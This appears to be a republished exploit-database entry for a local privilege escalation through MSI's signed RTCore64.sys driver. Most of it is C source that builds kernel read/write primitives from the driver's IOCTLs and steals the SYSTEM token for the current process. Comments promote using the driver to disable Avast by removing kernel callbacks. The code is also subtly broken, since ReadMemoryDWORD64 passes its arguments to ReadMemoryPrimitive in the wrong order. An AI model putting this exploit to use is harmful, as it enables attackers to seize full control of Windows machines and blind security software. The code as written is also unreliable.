MSI RTCore64.sys Privilege escalation
2024-10-8 05:21:48 Author: cxsecurity.com(查看原文) 阅读量:8 收藏

MSI RTCore64.sys Privilege escalation

CVSS Base Score: 7.2/10

Impact Subscore: 10/10

Exploitability Subscore: 3.9/10

Exploit range: Local

Attack complexity: Low

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

// RTCore64.sys allows arbitrary read/write, driver has a valid certificate. // [ / ]: You can use this driver to make 'Avast' completely useless by removing the kernel callback. /* Before all, there is an important thing to note: there are some offsets, but these offsets may vary with different Windows winver versions: '0x448 = ActiveProcessLinks', '0x4B8 = Token', '0x440 = UniqueProcessId' /* --- RTCORE64.H --- */ typedef struct _RTCORE64_READ_MEMORY { BYTE pad0[ 8 ]; DWORD64 address; BYTE pad1[ 8 ]; DWORD readsize; DWORD value; BYTE pad2[ 16 ]; } RTCORE64_READ_MEMORY; typedef struct _RTCORE64_WRITE_MEMORY { BYTE pad0[ 8 ]; DWORD64 address; BYTE pad1[ 8 ]; DWORD readsize; DWORD value; BYTE pad2[ 16 ]; } RTCORE64_WRITE_MEMORY; DWORD ReadMemoryPrimitive( HANDLE hDevice, DWORD64 address, DWORD size ) { RTCORE64_READ_MEMORY read_memory = { 0 }; read_memory.address = address; read_memory.readsize = size; DWORD bytes = 0; // 0x80002048 = RTCORE64_READ_MEMORY_IOCTL // DeviceIoControl( hDevice, 0x80002048, &read_memory, sizeof( read_memory ), &read_memory, sizeof( read_memory ), &bytes, NULL ); return read_memory.value; } DWORD64 ReadMemoryDWORD64( HANDLE hDevice, DWORD64 address ) { return ( DWORD64 ) ReadMemoryPrimitive( hDevice, 4, address + 4 ) << 32 | ReadMemoryPrimitive( hDevice, 4, address ); } void WriteMemoryPrimitive( HANDLE hDevice, DWORD64 address, DWORD size, DWORD value ) { RTCORE64_WRITE_MEMORY write_memory = { 0 }; write_memory.address = address; write_memory.readsize = size; write_memory.value = value; DWORD bytes = 0; // 0x8000204C = RTCORE64_WRITE_MEMORY_IOCTL // DeviceIoControl( hDevice, 0x8000204C, &write_memory, sizeof( write_memory ), &write_memory, sizeof( write_memory ), &bytes, NULL ); } void WriteMemoryDWORD64( HANDLE hDevice, DWORD64 address, DWORD64 value ) { WriteMemoryPrimitive( hDevice, 4, address, value & 0xFFFFFFFF ); WriteMemoryPrimitive( hDevice, 4, address + 4, value >> 32 ); } /* --- MAIN.C --- */ void NT_AUTHORITY_SYSTEM( void ) { HANDLE hDevice = CreateFileA( "\\\\.\\RTCore64", GENERIC_WRITE | GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL ); if ( hDevice == INVALID_HANDLE_VALUE || hDevice == NULL ) exit( 0 ); HMODULE ntoskrnl = LoadLibraryA( "ntoskrnl.exe" ); if ( ntoskrnl == NULL ) { CloseHandle( hDevice ); exit( 0 ); } DWORD64 PsInitialSystemProcessOffset = ( DWORD64 ) GetProcAddress( ntoskrnl, "PsInitialSystemProcess" ) - ( DWORD64 ) ntoskrnl; DWORD64 PsInitialSystemProcessAddress = ReadMemoryDWORD64( hDevice, GetNtoskrnlBaseAddress() + PsInitialSystemProcessOffset ); DWORD currentProcesID = GetCurrentProcessId(); DWORD64 currentProcessAddress = PsInitialSystemProcessAddress + 0x448; DWORD64 systemProcessToken = ReadMemoryDWORD64( hDevice, PsInitialSystemProcessAddress + 0x4B8 ) & ~15; do { DWORD64 processAddress = currentProcessAddress - 0x448; DWORD64 UniqueProcessId = ReadMemoryDWORD64( hDevice, processAddress + 0x440 ); if ( UniqueProcessId == ( DWORD64 ) ( currentProcesID ) ) break; currentProcessAddress = ReadMemoryDWORD64( hDevice, processAddress + 0x448 ); } while ( currentProcessAddress != PsInitialSystemProcessAddress + 0x448 ); currentProcessAddress -= 0x448; DWORD64 CurrentProcessTokenReferenceCounter = ReadMemoryDWORD64( hDevice, currentProcessAddress + 0x4B8 ) & 15; WriteMemoryDWORD64( hDevice, currentProcessAddress + 0x4B8, CurrentProcessTokenReferenceCounter | systemProcessToken ); CloseHandle( hDevice ); FreeLibrary( ntoskrnl ); }

References:

Privilege escalation:

https://github.com/Offensive-Panda/NT-AUTHORITY-SYSTEM-CONTEXT-RTCORE

[ / ]: Avast kernel callback remove:

https://medium.com/@VL1729_JustAT3ch/removing-process-creation-kernel-callbacks-c5636f5c849f




 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024100015
如有侵权请联系:admin#unsafe.sh